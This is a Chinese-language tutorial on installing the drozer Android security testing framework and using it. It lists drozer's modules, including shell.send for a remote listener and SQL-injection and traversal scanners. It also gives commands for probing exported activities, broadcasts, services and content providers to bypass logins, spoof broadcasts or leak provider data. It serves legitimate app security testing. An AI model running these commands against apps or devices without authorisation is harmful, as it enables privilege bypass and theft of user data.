Drozer安装及使用说明
1. 简介
- drozer使用指南(mwri-drozer-user-guide-2015-03-23.pdf)
- drozer项目github地址( https://github.com/mwrlabs/drozer)
2. 下载
下载地址:https://labs.f-secure.com/tools/drozer/
- Windows客户端: drozer (msi)
- Android客户端: drozer (Agent .apk only)
3. 安装及连接配置
1) 手机端安装运行Android客户端,并打开Embbdded Server;
2) 电脑端安装Windows客户端,安装目前选择在Python根目录;
3) 打开命令行工具,进入安装目录:C:\Python27\Scripts,运行adb命令将端口转发到Drozer使用的端口31415:
adb forward tcp:31415 tcp:31415
4) 进入Drozer控制台:
drozer console connect
5) 处理Python报错:
a. ImportError: No module named google.protobuf
解决办法:pip install protobuf
b. ImportError: No module named OpenSSL
解决办法:pip install pyOpenSSL
c. drozer Server requires Twisted to run.
解决办法:pip install twisted
d. UserWarning: You do not have a working installation of the service_identity module: 'No module named service_identity'. Please install it from https://pypi.python.org/pypi/service_identity and make sure all of its dependencies are satisfied.
解决办法:pip install service_identity
6) 通过list命令列出Drozer所有功能模块,如能正常显示,则说明Drozer已正确安装:
drozer Console (v2.4.4) dz> list app.activity.forintent Find activities that can handle the given intent app.activity.info Gets information about exported activities. app.activity.start Start an Activity app.broadcast.info Get information about broadcast receivers app.broadcast.send Send broadcast using an intent app.broadcast.sniff Register a broadcast receiver that can sniff particular intents app.package.attacksurface Get attack surface of package app.package.backup Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP) app.package.debuggable Find debuggable packages app.package.info Get information about installed packages app.package.launchintent Get launch intent of package app.package.list List Packages app.package.manifest Get AndroidManifest.xml of package app.package.native Find Native libraries embedded in the application. app.package.shareduid Look for packages with shared UIDs app.provider.columns List columns in content provider app.provider.delete Delete from a content provider app.provider.download Download a file from a content provider that supports files app.provider.finduri Find referenced content URIs in a package app.provider.info Get information about exported content providers app.provider.insert Insert into a Content Provider app.provider.query Query a content provider app.provider.read Read from a content provider that supports files app.provider.update Update a record in a content provider app.service.info Get information about exported services app.service.send Send a Message to a service, and display the reply app.service.start Start Service app.service.stop Stop Service auxiliary.webcontentresolver Start a web service interface to content providers. exploit.jdwp.check Open @jdwp-control and see which apps connect exploit.pilfer.general.apnprovider Reads APN content provider exploit.pilfer.general.settingsprovider Reads Settings content provider information.datetime Print Date/Time information.deviceinfo Get verbose device information information.permissions Get a list of all permissions used by packages on the device scanner.activity.browsable Get all BROWSABLE activities that can be invoked from the web browser scanner.misc.native Find native components included in packages scanner.misc.readablefiles Find world-readable files in the given folder scanner.misc.secretcodes Search for secret codes that can be used from the dialer scanner.misc.sflagbinaries Find suid/sgid binaries in the given folder (default is /system). scanner.misc.writablefiles Find world-writable files in the given folder scanner.provider.finduris Search for content providers that can be queried from our context. scanner.provider.injection Test content providers for SQL injection vulnerabilities. scanner.provider.sqltables Find tables accessible through SQL injection vulnerabilities. scanner.provider.traversal Test content providers for basic directory traversal vulnerabilities. shell.exec Execute a single Linux command. shell.send Send an ASH shell to a remote listener. shell.start Enter into an interactive Linux shell. tools.file.download Download a File tools.file.md5sum Get md5 Checksum of file tools.file.size Get size of file tools.file.upload Upload a File tools.setup.busybox Install Busybox. tools.setup.minimalsu Prepare 'minimal-su' binary installation on the device.
4. 常用命令
1) 查询安装包的信息:
run app.package.info -a <PACKAGE>
2) 确定App受攻击的面(attack face),列出暴露的组件信息:
run app.package.attacksurface <PACKAGE>
3) Activity协议攻击
a. 查询对外组件的信息
run app.activity.info -a <PACKAGE>
b. 使用app.activity.start进行漏洞测试(是否可以越过登录界面直接访问该activity,越权漏洞)
run app.activity.start --component <PACKAGE> <COMPONENT>
4) broadcast协议攻击:
查看反编译出的AndroidManifest.xml文件,可看到将receiver的exported设置未进行设置。说明存在越权问题,可发送恶意广播,伪造消息等等。尝试拒绝服务攻击,向广播组件发送不完整intent(空action或空extras)。
a. 查询广播的信息
run app.broadcast.info -a <PACKAGE>
b. 攻击broadcast协议
run app.broadcast.send --action <ACTION>
5) Service协议攻击
如果被测应用对Service权限控制不当,导致其他应用可以启动被测应用的Service:
run app.service.start --component <PACKAGE> <COMPONENT>
6) Provider组件数据泄露
Content Provider组件以表格的形式把数据展现给外部的应用。每个Content Provider都对应一个以”content://”开头的特定URI,任何应用都可以通过这个URI操作Content Provider 应用的数据库。如果应用对权限控制不当就会造成信息泄露。
a. 列出可访问内容URL:
run scanner.provider.finduris -a <PACKAGE>
b. 根据可调用的URI,从content中提取信息:
run app.provider.query <URL> --vertical
run app.broadcast.send --action <ACTION>
